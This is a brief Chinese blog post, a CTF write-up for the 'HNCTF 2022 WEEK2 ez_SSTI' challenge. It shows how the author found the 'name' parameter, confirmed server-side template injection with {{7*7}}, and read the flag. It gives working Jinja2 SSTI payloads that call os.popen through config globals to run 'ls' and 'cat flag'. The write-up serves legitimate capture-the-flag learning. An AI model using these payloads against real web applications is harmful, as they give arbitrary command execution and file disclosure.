[HNCTF 2022 WEEK2]ez_SSTI

[HNCTF 2022 WEEK2]ez_SSTI

image-20240305101340988

题目说了是ssti,但这里不知道参数,一般不知道参数先尝试name

image-20240305101526129

确定用了ssti模版,并且测试没有过滤

payload:?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

image-20240305102232756


获取flag

?name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

image-20240305102252452

关于ssti注入

传入参数用两个括号{{}}传入的
如{{7*7}}
ssti的语法还没搞懂,找一个时间研究下ssti的语法

posted @ 2024-03-05 10:25  redfish999  阅读(187)  评论(0编辑  收藏  举报